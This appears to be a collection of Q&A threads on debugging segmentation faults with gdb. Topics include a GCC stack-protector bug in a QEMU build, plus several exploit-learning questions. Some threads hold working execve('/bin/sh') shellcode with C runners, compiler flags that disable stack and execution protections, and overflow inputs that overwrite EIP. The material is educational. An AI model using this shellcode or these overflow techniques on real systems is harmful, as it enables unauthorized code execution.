Root cause a segmentation fault

Background
I've built qemu-system-x86_64.exe on a Windows machine using MSYS2 (x86_64), and I'm debugging a segmentation fault that happens when I try to run it.
I don't think the problem is actually specific to either QEMU or MSYS2; it is a question of how to debug a segmentation fault, possibly one caused by wrong code generation.
Debugging the Segmentation Fault
The program crashes with a segmentation fault right at startup.
When running with gdb, I found out the following:
Starting program: C:\msys64\home\Administrator\qemu\x86_64-softmmu\qemu-system-x86_64.exe
[New Thread 4656.0x1194]
Program received signal SIGSEGV, Segmentation fault.
0x00000000007d3254 in getpagesize () at util/oslib-win32.c:535
535 {
(gdb) bt
#0 0x00000000007d3254 in getpagesize () at util/oslib-win32.c:535
#1 0x000000000086dd39 in init_real_host_page_size () at util/pagesize.c:16
#2 0x00000000007ea1b2 in __do_global_ctors ()
at C:/repo/mingw-w64-crt-git/src/mingw-w64/mingw-w64-crt/crt/gccmain.c:67
#3 0x00000000007ea20f in __main ()
at C:/repo/mingw-w64-crt-git/src/mingw-w64/mingw-w64-crt/crt/gccmain.c:83
#4 0x000000000040137f in __tmainCRTStartup ()
at C:/repo/mingw-w64-crt-git/src/mingw-w64/mingw-w64-crt/crt/crtexe.c:329
#5 0x00000000004014db in WinMainCRTStartup ()
at C:/repo/mingw-w64-crt-git/src/mingw-w64/mingw-w64-crt/crt/crtexe.c:195
This is strange.
The program crashes when running __do_global_ctors and calling init_real_host_page_size() which calls getpagesize(). These are really simple functions:
uintptr_t qemu_real_host_page_size;
intptr_t qemu_real_host_page_mask;
static void __attribute__((constructor)) init_real_host_page_size(void)
{
qemu_real_host_page_size = getpagesize();
qemu_real_host_page_mask = -(intptr_t)qemu_real_host_page_size;
}
...
int getpagesize(void)
{
SYSTEM_INFO system_info;
GetSystemInfo(&system_info);
return system_info.dwPageSize;
}
getpagesize() crashes right at the beginning of the function, before it even calls GetSystemInfo.
Here is the disassembly of that code fragment and register values:
(gdb) disassem
Dump of assembler code for function getpagesize:
0x00000000007d3250 <+0>: sub $0x68,%rsp
=> 0x00000000007d3254 <+4>: mov %fs:0x0,%rax
0x00000000007d325d <+13>: mov %rax,0x58(%rsp)
0x00000000007d3262 <+18>: xor %eax,%eax
0x00000000007d3264 <+20>: lea 0x20(%rsp),%rcx
0x00000000007d3269 <+25>: callq *0x68e8b9(%rip) # 0xe61b28 <__imp_GetSystemInfo>
0x00000000007d326f <+31>: mov 0x24(%rsp),%eax
0x00000000007d3273 <+35>: mov 0x58(%rsp),%rdx
0x00000000007d3278 <+40>: xor %fs:0x0,%rdx
0x00000000007d3281 <+49>: jne 0x7d3288 <getpagesize+56>
0x00000000007d3283 <+51>: add $0x68,%rsp
0x00000000007d3287 <+55>: retq
0x00000000007d3288 <+56>: callq 0x85bde0 <__stack_chk_fail>
0x00000000007d328d <+61>: nop
End of assembler dump.
(gdb) info registers
rax 0x6f4b868 116701288
rbx 0x86ec10 8842256
rcx 0x6f4b8b8 116701368
rdx 0xe5a780 15050624
rsi 0x86e220 8839712
rdi 0x6f4ad50 116698448
rbp 0x6f4ad10 0x6f4ad10
rsp 0x22fd80 0x22fd80
r8 0x0 0
r9 0x0 0
r10 0x5000016b 1342177643
r11 0x22f9d8 2292184
r12 0x0 0
r13 0x10 16
r14 0x0 0
r15 0x0 0
rip 0x7d3254 0x7d3254 <getpagesize+4>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x53 83
gs 0x2b 43
It looks like something is wrong with the memory access mov %fs:0x0,%rax.
Who sets FS to 83?
(gdb) starti
Starting program: C:\msys64\home\Administrator\qemu\x86_64-softmmu\qemu-system-x86_64.exe
[New Thread 3508.0x14b0]
Program stopped.
0x00000000778b6fb1 in ntdll!CsrSetPriorityClass ()
from C:\Windows\SYSTEM32\ntdll.dll
(gdb) p $fs
$1 = 83
(gdb) watch $fs
Watchpoint 1: $fs
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00000000007d3254 in getpagesize () at util/oslib-win32.c:535
535 {
No one sets FS!
Questions
GCC generated code that uses an uninitialized register. What could cause that? Was there some initialization code that should have run but didn't?
Any ideas on how I can debug this issue further?

FS is an x86 segment register. These are generally not set by the user program, but instead set by the OS or by the runtime libraries, for various special purposes. For instance on Windows x86-64 GS is used to point to a per-thread data block: https://en.wikipedia.org/wiki/Win32_Thread_Information_Block (and FS is not used).
In this case the problem is a bug in the GCC 8 compiler you are using: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=86832
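In some situations this compiler generates code that assumes FS has been set up for "native TLS", which is wrong because MinGW does not support "native TLS" and FS is not set to anything useful. In your disassembly, that is the stack-protector canary load mov %fs:0x0,%rax at the top of getpagesize.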
The workaround is to avoid compiling with the -fstack-protector-strong compiler option. For QEMU you can do that by passing configure the flag --disable-stack-protector.
(PS: if you want to know how I identified the cause of this segfault: I googled for 'qemu-devel sigsegv getpagesize', which brings up a mailing list thread where somebody else ran into and reported the bug, the problem was diagnosed and a link to the GCC bug found.)
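To see why the backtrace shows __do_global_ctors rather than main, it may help to reproduce the constructor pattern in isolation. The sketch below is a POSIX stand-in, not QEMU's code: the demo_* names are hypothetical, and sysconf(_SC_PAGESIZE) is used as an assumption in place of the Windows GetSystemInfo call.

```c
#include <stdint.h>
#include <unistd.h>

/* Hypothetical stand-ins for QEMU's globals; names are illustrative only. */
static uintptr_t demo_page_size;
static intptr_t demo_page_mask;

/* GCC and Clang run constructor functions before main(), so a fault in
 * here shows up with startup code (not main) in the backtrace. */
static void __attribute__((constructor)) demo_init_page_size(void)
{
    long sz = sysconf(_SC_PAGESIZE);   /* POSIX; assumption: not Windows */
    demo_page_size = (sz > 0) ? (uintptr_t)sz : 4096;
    demo_page_mask = -(intptr_t)demo_page_size;
}

uintptr_t demo_get_page_size(void) { return demo_page_size; }
intptr_t demo_get_page_mask(void) { return demo_page_mask; }
```

Calling demo_get_page_size() from main returns a nonzero value even though main never initialized it, because the constructor already ran during startup. A fault inside such a constructor therefore happens before main is entered.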

Related

What controls whether code stored in the data section can run or not?

https://www.exploit-db.com/exploits/42179
#include <stdio.h>
unsigned char shellcode[] = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}
According to the comment in the code, gcc -fno-stack-protector -z execstack shell.c -o shell is supposed to compile the code on #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux.
I get the following error when I try the above code. How can I make it work? What has changed in the OS so that it no longer works?
$ uname -a
Linux kali 5.10.0-kali4-amd64 #1 SMP Debian 5.10.19-1kali1 (2021-03-03) x86_64 GNU/Linux
$ gcc -fno-stack-protector -z execstack shell.c -o shell
$ ./shell
Segmentation fault
EDIT: It seems the problem is related to Kali Linux. The same binary runs on 64-bit Ubuntu. I tried to step through the binary with gdb on Kali.
The segmentation fault on Kali is raised when the shellcode is run.
$ gdb -q shell
Reading symbols from shell...
(No debugging symbols found in shell)
(gdb) b main
Breakpoint 1 at 0x1129
(gdb) start
Temporary breakpoint 2 at 0x1129
Starting program: /tmp/shell
Breakpoint 1, 0x0000555555555129 in main ()
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555125 <+0>: push %rbp
0x0000555555555126 <+1>: mov %rsp,%rbp
=> 0x0000555555555129 <+4>: sub $0x10,%rsp
0x000055555555512d <+8>: lea 0x2efc(%rip),%rax # 0x555555558030 <shellcode>
0x0000555555555134 <+15>: mov %rax,-0x8(%rbp)
0x0000555555555138 <+19>: mov -0x8(%rbp),%rdx
0x000055555555513c <+23>: mov $0x0,%eax
0x0000555555555141 <+28>: call *%rdx
0x0000555555555143 <+30>: mov $0x0,%eax
0x0000555555555148 <+35>: leave
0x0000555555555149 <+36>: ret
End of assembler dump.
(gdb) si 5
0x0000555555555141 in main ()
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555125 <+0>: push %rbp
0x0000555555555126 <+1>: mov %rsp,%rbp
0x0000555555555129 <+4>: sub $0x10,%rsp
0x000055555555512d <+8>: lea 0x2efc(%rip),%rax # 0x555555558030 <shellcode>
0x0000555555555134 <+15>: mov %rax,-0x8(%rbp)
0x0000555555555138 <+19>: mov -0x8(%rbp),%rdx
0x000055555555513c <+23>: mov $0x0,%eax
=> 0x0000555555555141 <+28>: call *%rdx
0x0000555555555143 <+30>: mov $0x0,%eax
0x0000555555555148 <+35>: leave
0x0000555555555149 <+36>: ret
End of assembler dump.
(gdb) si
0x0000555555558030 in shellcode ()
(gdb) si
Program received signal SIGSEGV, Segmentation fault.
0x0000555555558030 in shellcode ()
(gdb) x/16bx 0x0000555555558030
0x555555558030 <shellcode>: 0x50 0x48 0x31 0xd2 0x48 0x31 0xf6 0x48
0x555555558038 <shellcode+8>: 0xbb 0x2f 0x62 0x69 0x6e 0x2f 0x2f 0x73
Using the same binary on Ubuntu, the shellcode runs correctly.
When I modify the code to put the shellcode on the stack, it runs on Kali. So the problem is whether code in the data section can be executed or not. What controls this behavior?
$ cat shell.c
#include <stdio.h>
int main() {
unsigned char shellcode[] = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int (*ret)() = (int(*)())shellcode;
ret();
}

What has been changed in the OS so that it does not work any more?
It used to be that readonly-data (.rodata) was put into the read-execute segment, together with .text.
To put shellcode into .rodata, you would need to make it const:
unsigned const char shellcode[] = ...
I don't think the example without const ever worked.
Once you put it into .rodata, it will work when linking with -Wl,-z,noseparate-code on newer systems (if your linker doesn't support noseparate-code, then it is probably old enough that the example will work without any special flags).
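One way to check which mappings are executable on a given system is to look up an address in /proc/self/maps. The following is a minimal Linux-only sketch; perms_for_address is a hypothetical helper written for this illustration, not part of any library.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Looks up the mapping that contains addr in /proc/self/maps and copies
 * its 4-character permission string (e.g. "rw-p") into perms.
 * Returns 0 on success, -1 if the file cannot be read or no mapping matches. */
int perms_for_address(const void *addr, char perms[5])
{
    FILE *f = fopen("/proc/self/maps", "r");
    char line[512];
    uintptr_t target = (uintptr_t)addr;
    int found = -1;

    if (!f)
        return -1;
    while (fgets(line, sizeof line, f)) {
        unsigned long start, end;
        char p[5];

        /* Each line begins with "start-end perms ..." in hexadecimal. */
        if (sscanf(line, "%lx-%lx %4s", &start, &end, p) != 3)
            continue;
        if (target >= start && target < end) {
            memcpy(perms, p, sizeof p);
            found = 0;
            break;
        }
    }
    fclose(f);
    return found;
}
```

Passing the address of a global, non-const array like the shellcode in the question would typically yield rw-p on a current kernel: readable and writable, but not executable, which is why the call into it faults.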

gdb addresses: 0x565561f5 instead of 0x41414141

I want to try a buffer overflow on a C program. I compiled it with gcc like this: gcc -fno-stack-protector -m32 buggy_program.c. If I run this program in gdb and overflow the buffer, it should report 0x41414141, because I sent A's. But it reports 0x565561f5 instead. Sorry for my bad English. Can somebody help me?
This is the source code:
#include <stdio.h>
int main(int argc, char **argv)
{
char buffer[64];
printf("Type in something: ");
gets(buffer);
}
Starting program: /root/Downloads/a.out
Type in something: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x565561f5 in main ()
I want to see this:
Starting program: /root/Downloads/a.out
Type in something: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in main ()

Looking at the address at which the process segfaulted shows the relevant line in the disassembled code:
gdb a.out <<EOF
set logging on
r < inp
disassemble main
x/i $eip
p/x $esp
EOF
Produces the following output:
(gdb) Starting program: .../a.out < in
Program received signal SIGSEGV, Segmentation fault.
0x08048482 in main (argc=, argv=) at tmp.c:10 10 }
(gdb) Dump of assembler code for function main:
0x08048436 <+0>: lea 0x4(%esp),%ecx
0x0804843a <+4>: and $0xfffffff0,%esp
0x0804843d <+7>: pushl -0x4(%ecx)
0x08048440 <+10>: push %ebp
0x08048441 <+11>: mov %esp,%ebp
0x08048443 <+13>: push %ebx
0x08048444 <+14>: push %ecx
0x08048445 <+15>: sub $0x40,%esp
0x08048448 <+18>: call 0x8048370 <__x86.get_pc_thunk.bx>
0x0804844d <+23>: add $0x1bb3,%ebx
0x08048453 <+29>: sub $0xc,%esp
0x08048456 <+32>: lea -0x1af0(%ebx),%eax
0x0804845c <+38>: push %eax
0x0804845d <+39>: call 0x8048300
0x08048462 <+44>: add $0x10,%esp
0x08048465 <+47>: sub $0xc,%esp
0x08048468 <+50>: lea -0x48(%ebp),%eax
0x0804846b <+53>: push %eax
0x0804846c <+54>: call 0x8048310
0x08048471 <+59>: add $0x10,%esp
0x08048474 <+62>: mov $0x0,%eax
0x08048479 <+67>: lea -0x8(%ebp),%esp
0x0804847c <+70>: pop %ecx
0x0804847d <+71>: pop %ebx
0x0804847e <+72>: pop %ebp
0x0804847f <+73>: lea -0x4(%ecx),%esp
=> 0x08048482 <+76>: ret
End of assembler dump.
(gdb) => 0x8048482 : ret
(gdb) $1 = 0x4141413d
(gdb) quit
The failing statement is the ret at the end of main. The program fails when ret attempts to load the return address from the top of the stack. The prologue saves the original stack pointer (in ecx, as esp+4) on the stack before aligning esp to a 16-byte boundary (and $0xfffffff0,%esp). When main completes, the epilogue pops that saved value back into ecx and restores esp from it (lea -0x4(%ecx),%esp) before executing ret. However, the overflow has overwritten that part of the stack, so the restored stack pointer is garbage ($1 = 0x4141413d, i.e. 0x41414141 - 4). When ret is executed, it attempts to read a word from address 0x4141413d, which is not mapped, and this produces the segfault.
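The stack-pointer arithmetic can be checked with a tiny model of the epilogue. This is only a sketch of the single instruction lea -0x4(%ecx),%esp; the function name is hypothetical.

```c
#include <stdint.h>

/* Models the epilogue's `lea -0x4(%ecx),%esp`: the new stack pointer is
 * whatever value was popped into ecx, minus 4. */
uint32_t esp_after_epilogue(uint32_t popped_ecx)
{
    return popped_ecx - 4u;
}
```

With the saved ecx overwritten by "AAAA" (0x41414141), esp_after_epilogue returns 0x4141413d, which matches the p/x $esp output in the session.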
Notes
The above disassembly was produced from the code in the question using the following compiler-options:
-m32 -fno-stack-protector -g -O0

So guys, I found a solution:
Just compile it with gcc 3.3.4:
gcc -m32 buggy_program.c

Modern operating systems use address space layout randomization (ASLR) to make this stuff not work quite so easily.
I remember the controversy when it was first started. ASLR was kind of a bad idea for 32 bit processes due to the number of other constraints it imposed on the system and dubious security benefit. On the other hand, it works great on 64 bit processes and almost everybody uses it now.
You don't know where the code is. You don't know where the heap is. You don't know where the stack is. Writing exploits is hard now.
Also, you tried to use 32 bit shellcode and documentation on a 64 bit process.
On reading the updated question: Your code is compiled with frame pointers (which is the default). This is causing the ret instruction itself to fault because esp is trashed. ASLR appears to still be in play, but most likely it doesn't really matter here.

Testing Shellcode With GDB [duplicate]

This question already has an answer here:
Testing Shellcode From C - Bus Error 10
If I just execute the shellcode program, it segfaults like this:
desktop:~$ ./sh02
Segmentation fault (core dumped)
But when I debug this program with GDB, it executes /bin/sh successfully:
(gdb) disass 0x4005a0
No function contains specified address.
(gdb) shell ps
PID TTY TIME CMD
4075 pts/4 00:00:00 bash
4099 pts/4 00:00:00 gdb
4101 pts/4 00:00:00 sh
4107 pts/4 00:00:00 ps
(gdb)
After debugging with GDB, this program works well ...
I can't find the difference between the two cases.
Why can't I run /bin/sh via the sh02 program before debugging?
const char str[]=
"\x55"
"\x48\x89\xe5"
"\x48\x31\xff"
"\x57"
"\x57"
"\x5e"
"\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e"
"\x2f\x73\x68"
"\x57"
"\x54"
"\x5f"
"\x6a\x3b"
"\x58"
"\x0f\x05"
"\x90"
"\x5d"
"\xc3";
int main()
{
int (*func)();
func = (int (*)()) str;
(int)(*func)();
}
Above is the sh02.c code.
I have read that question and its answers, but I think my case is a little different. During and after debugging with GDB, the sh02 program executes /bin/sh successfully; only before debugging does it segfault.
I use Ubuntu 16.04 on the x64 architecture.

When undefined behavior is invoked, the program may or may not crash (by luck). The program does not null-terminate the string passed to the exec system call, so the results are undefined.
Try this:
"\x48\xbf\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
Note that I dropped the extra '/' and added the '\0' at the end of the string.
I was able to determine the issue by using gdb.
Here is the session; perhaps it will help you learn assembly debugging.
parallels@ubuntu:/tmp$ gcc -g -fno-stack-protector -z execstack -o shellcode shellcode2.c
parallels@ubuntu:/tmp$ gdb ./shellcode
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
...
Reading symbols from ./shellcode...done.
(gdb) b main
Breakpoint 1 at 0x4004f5: file shellcode2.c, line 25.
(gdb) r
Starting program: /tmp/shellcode
Breakpoint 1, main () at shellcode2.c:25
25 func = (int (*)()) str;
(gdb) n
27 (int)(*func)();
(gdb) stepi
0x0000000000400501 27 (int)(*func)();
(gdb) stepi
0x0000000000400506 27 (int)(*func)();
(gdb) stepi
0x00000000004005c0 in str ()
(gdb) disass
Dump of assembler code for function str:
=> 0x00000000004005c0 <+0>: push %rbp
0x00000000004005c1 <+1>: mov %rsp,%rbp
0x00000000004005c4 <+4>: xor %rdi,%rdi
0x00000000004005c7 <+7>: push %rdi
0x00000000004005c8 <+8>: push %rdi
0x00000000004005c9 <+9>: pop %rsi
0x00000000004005ca <+10>: pop %rdx
0x00000000004005cb <+11>: movabs $0x68732f6e69622f2f,%rdi
0x00000000004005d5 <+21>: push %rdi
0x00000000004005d6 <+22>: push %rsp
0x00000000004005d7 <+23>: pop %rdi
0x00000000004005d8 <+24>: pushq $0x3b
0x00000000004005da <+26>: pop %rax
0x00000000004005db <+27>: syscall
0x00000000004005dd <+29>: nop
0x00000000004005de <+30>: pop %rbp
0x00000000004005df <+31>: retq
0x00000000004005e0 <+32>: add %al,(%rax)
End of assembler dump.
(gdb) b *0x4005db
Breakpoint 2 at 0x4005db
(gdb) c
Continuing.
Breakpoint 2, 0x00000000004005db in str ()
(gdb) info reg
rax 0x3b 59
rbx 0x0 0
rcx 0x0 0
rdx 0x0 0
rsi 0x0 0
rdi 0x7fffffffdef8 140737488346872
rbp 0x7fffffffdf00 0x7fffffffdf00
rsp 0x7fffffffdef8 0x7fffffffdef8
r8 0x7ffff7dd4e80 140737351863936
r9 0x7ffff7dea560 140737351951712
r10 0x7fffffffddb0 140737488346544
r11 0x7ffff7a36dd0 140737348070864
r12 0x400400 4195328
r13 0x7fffffffe000 140737488347136
r14 0x0 0
r15 0x0 0
rip 0x4005db 0x4005db <str+27>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) p (char*) $rdi
$1 = 0x7fffffffdef8 "//bin/sh \337\377\377\377\177"
As you can see, the string has an extra '/' and no NUL terminator. A simple two-character fix and all is well.
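The reason the extra '/' matters is that the path is pushed as a single 8-byte immediate: "//bin/sh" uses all eight bytes and leaves no room for a terminator, while "/bin/sh" leaves the top byte free for '\0'. A small sketch (the helper name is hypothetical) that counts the bytes before the first zero byte of such an immediate, reading it in x86 little-endian order:

```c
#include <stddef.h>
#include <stdint.h>

/* Returns how many bytes of an 8-byte immediate precede its first zero
 * byte, reading from the least significant byte upward (the order in
 * which x86 stores it in memory). Returns 8 if there is no zero byte,
 * i.e. the pushed string is not terminated by the immediate itself. */
size_t immediate_strlen(uint64_t imm)
{
    size_t n = 0;

    while (n < 8 && ((imm >> (8 * n)) & 0xffu) != 0)
        n++;
    return n;
}
```

For the original immediate 0x68732f6e69622f2f ("//bin/sh") this returns 8, so whatever follows on the stack becomes part of the path. For 0x0068732f6e69622f ("/bin/sh" plus a zero byte) it returns 7.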

EIP value incorrect during buffer overflow

I am working on Ubuntu 12.04 on a 64-bit machine. I was reading a good book on buffer overflows and, while playing with one example, ran into something strange.
I have this really simple C code:
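#include <stdio.h>
void getInput(void) {
    char array[8];
    gets(array);  /* deliberately unsafe: no bounds check, this is the overflow under study */
    printf("%s\n", array);
}
int main(void) {
    getInput();
    return 0;
}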
in the file overflow.c
I compile it with the 32-bit flag, because all the examples in the book assume a 32-bit machine, like this:
gcc -fno-stack-protector -g -m32 -o ./overflow ./overflow.c
In the code the char array is only 8 bytes, but looking at the disassembly I found that the array starts 16 bytes away from the saved EBP on the stack, so I executed this line:
printf "aaaaaaaaaaaaaaaaaaaa\x10\x10\x10\x20" | ./overflow
And got:
aaaaaaaaaaaaaaaaaaaa
Segmentation fault (core dumped)
Then I opened core file:
gdb ./overflow core
#0 0x20101010 in ?? ()
(gdb) info registers
eax 0x19 25
ecx 0xffffffff -1
edx 0xf77118b8 -143583048
ebx 0xf770fff4 -143589388
esp 0xffef6370 0xffef6370
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0x20101010 0x20101010
As you can see, EIP did get the new value I wanted. But when I try to put in a useful value such as 0x08048410:
printf "aaaaaaaaaaaaaaaaaaaa\x10\x84\x04\x08" | ./overflow
the program crashes as usual, but then something strange happens when I try to observe the value in the EIP register:
#0 0xf765be1f in ?? () from /lib/i386-linux-gnu/libc.so.6
(gdb) info registers
eax 0x61616151 1633771857
ecx 0xf77828c4 -143120188
edx 0x1 1
ebx 0xf7780ff4 -143126540
esp 0xff92dffc 0xff92dffc
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0xf765be1f 0xf765be1f
Suddenly EIP looks like 0xf765be1f instead of 0x08048410. In fact, I noticed that any hexadecimal value starting with 0 is enough to produce this garbled EIP value. Do you know why this might happen? Is it because I'm on a 64-bit machine?
UPD
People in the comments asked for more information, so here is the disassembly of the getInput function:
(gdb) disas getInput
Dump of assembler code for function getInput:
0x08048404 <+0>: push %ebp
0x08048405 <+1>: mov %esp,%ebp
0x08048407 <+3>: sub $0x28,%esp
0x0804840a <+6>: lea -0x10(%ebp),%eax
0x0804840d <+9>: mov %eax,(%esp)
0x08048410 <+12>: call 0x8048310 <gets@plt>
0x08048415 <+17>: lea -0x10(%ebp),%eax
0x08048418 <+20>: mov %eax,(%esp)
0x0804841b <+23>: call 0x8048320 <puts@plt>
0x08048420 <+28>: leave
0x08048421 <+29>: ret

Perhaps code at 0x08048410 was executed, and jumped to the area of 0xf765be1f.
What's in this address? I guess it's a function (libC?), so you can examine its assembly code and see what it would do.
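Also note that in the first run you overwrote both the saved EBP and the return address: EBP contains 0x61616161, which is aaaa, and EIP contains 0x20101010, which is the four bytes \x10\x10\x10\x20 from your input in little-endian order. So the return address is already under your control.
In the second run the return most likely does go to 0x08048410. According to your disassembly, that address is the call to gets in the middle of getInput, so the program runs on from there with a corrupted frame and only crashes later, inside libc.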
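The layout implied by the question's disassembly (buffer at -0x10(%ebp), then the 4-byte saved EBP, then the return address) can be written down as a small payload builder. This is a sketch for the 32-bit frame in the question only; build_payload and its parameters are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fills `out` with filler bytes up to the saved return address, then the
 * 32-bit target address in little-endian order. Returns the payload
 * length, or 0 if `out` is too small.
 * buf_to_ebp: distance from the start of the buffer to the saved EBP. */
size_t build_payload(unsigned char *out, size_t out_len,
                     size_t buf_to_ebp, uint32_t target)
{
    size_t ret_off = buf_to_ebp + 4;   /* skip the 4-byte saved EBP */
    size_t total = ret_off + 4;

    if (out_len < total)
        return 0;
    memset(out, 'a', ret_off);
    for (size_t i = 0; i < 4; i++)
        out[ret_off + i] = (unsigned char)(target >> (8 * i));
    return total;
}
```

With buf_to_ebp = 0x10 and target = 0x08048410 this produces 20 filler bytes followed by \x10\x84\x04\x08, the same 24 bytes as the printf command in the question. The first 16 bytes fill the buffer, the next 4 overwrite the saved EBP (hence 0x61616161), and the last 4 land in EIP.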

This is probably due to the fact that modern OS (Linux does at least, I don't know about Windows) and modern libc have mechanisms that do not allow code found in stack to be executed.

Buffer overflow is invoking undefined behavior, therefore anything can happen. Theorizing what might happen is futile.

Memcpy segfaulting with valid pointers

I'm using libcurl in my program, and running into a segfault. Before I filed a bug with the curl project, I thought I'd do a little debugging. What I found seemed very odd to me, and I haven't been able to make sense of it yet.
First, the segfault traceback:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffe77f6700 (LWP 592)]
0x00007ffff6a2ea5c in memcpy () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0 0x00007ffff6a2ea5c in memcpy () from /lib/x86_64-linux-gnu/libc.so.6
#1 0x00007ffff5bc29e5 in x509_name_oneline (a=0x7fffe3d9c3c0,
buf=0x7fffe77f4ec0 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%", size=255) at ssluse.c:629
#2 0x00007ffff5bc2a6f in cert_verify_callback (ok=1, ctx=0x7fffe77f50b0)
at ssluse.c:645
#3 0x00007ffff72c9a80 in ?? () from /lib/libcrypto.so.0.9.8
#4 0x00007ffff72ca430 in X509_verify_cert () from /lib/libcrypto.so.0.9.8
#5 0x00007ffff759af58 in ssl_verify_cert_chain () from /lib/libssl.so.0.9.8
#6 0x00007ffff75809f3 in ssl3_get_server_certificate ()
from /lib/libssl.so.0.9.8
#7 0x00007ffff7583e50 in ssl3_connect () from /lib/libssl.so.0.9.8
#8 0x00007ffff5bc48f0 in ossl_connect_step2 (conn=0x7fffe315e9a8, sockindex=0)
at ssluse.c:1724
#9 0x00007ffff5bc700f in ossl_connect_common (conn=0x7fffe315e9a8,
sockindex=0, nonblocking=false, done=0x7fffe77f543f) at ssluse.c:2498
#10 0x00007ffff5bc7172 in Curl_ossl_connect (conn=0x7fffe315e9a8, sockindex=0)
at ssluse.c:2544
#11 0x00007ffff5ba76b9 in Curl_ssl_connect (conn=0x7fffe315e9a8, sockindex=0)
...
The call to memcpy looks like this:
memcpy(buf, biomem->data, size);
(gdb) p buf
$46 = 0x7fffe77f4ec0 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%"
(gdb) p biomem->data
$47 = 0x7fffe3e1ef60 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%"
(gdb) p size
$48 = 255
If I go up a frame, I see that the pointer passed in for buf came from a local variable defined in the calling function:
char buf[256];
Here's where it starts to get weird. I can manually inspect all 256 bytes of both buf and biomem->data without gdb complaining that the memory isn't accessible. I can also manually write all 256 bytes of buf using the gdb set command, without any error. So if all the memory involved is readable and writable, why does memcpy fail?
Also interesting is that I can use gdb to manually call memcpy with the pointers involved. As long as I pass a size <= 160, it runs without a problem. As soon as I pass 161 or higher, gdb gets a sigsegv. I know buf is larger than 160, because it was created on the stack as an array of 256. biomem->data is a little harder to figure, but I can read well past byte 160 with gdb.
I should also mention that this function (or rather the curl method I call that leads to this) completes successfully many times before the crash. My program uses curl to repeatedly call a web service API while it runs. It calls the API every five seconds or so, and runs for about 14 hours before it crashes. It's possible that something else in my app is writing out of bounds and stomping on something that creates the error condition. But it seems suspicious that it crashes at exactly the same point every time, although the timing varies. And all the pointers seem ok in gdb, but memcpy still fails. Valgrind doesn't find any bounds errors, but I haven't let my program run with valgrind for 14 hours.
Within memcpy itself, the disassembly looks like this:
(gdb) x/20i $rip-10
0x7ffff6a2ea52 <memcpy+242>: jbe 0x7ffff6a2ea74 <memcpy+276>
0x7ffff6a2ea54 <memcpy+244>: lea 0x20(%rdi),%rdi
0x7ffff6a2ea58 <memcpy+248>: je 0x7ffff6a2ea90 <memcpy+304>
0x7ffff6a2ea5a <memcpy+250>: dec %ecx
=> 0x7ffff6a2ea5c <memcpy+252>: mov (%rsi),%rax
0x7ffff6a2ea5f <memcpy+255>: mov 0x8(%rsi),%r8
0x7ffff6a2ea63 <memcpy+259>: mov 0x10(%rsi),%r9
0x7ffff6a2ea67 <memcpy+263>: mov 0x18(%rsi),%r10
0x7ffff6a2ea6b <memcpy+267>: mov %rax,(%rdi)
0x7ffff6a2ea6e <memcpy+270>: mov %r8,0x8(%rdi)
0x7ffff6a2ea72 <memcpy+274>: mov %r9,0x10(%rdi)
0x7ffff6a2ea76 <memcpy+278>: mov %r10,0x18(%rdi)
0x7ffff6a2ea7a <memcpy+282>: lea 0x20(%rsi),%rsi
0x7ffff6a2ea7e <memcpy+286>: lea 0x20(%rdi),%rdi
0x7ffff6a2ea82 <memcpy+290>: jne 0x7ffff6a2ea30 <memcpy+208>
0x7ffff6a2ea84 <memcpy+292>: data32 data32 nopw %cs:0x0(%rax,%rax,1)
0x7ffff6a2ea90 <memcpy+304>: and $0x1f,%edx
0x7ffff6a2ea93 <memcpy+307>: mov -0x8(%rsp),%rax
0x7ffff6a2ea98 <memcpy+312>: jne 0x7ffff6a2e969 <memcpy+9>
0x7ffff6a2ea9e <memcpy+318>: repz retq
(gdb) info registers
rax 0x0 0
rbx 0x7fffe77f50b0 140737077268656
rcx 0x1 1
rdx 0xff 255
rsi 0x7fffe3e1f000 140737016623104
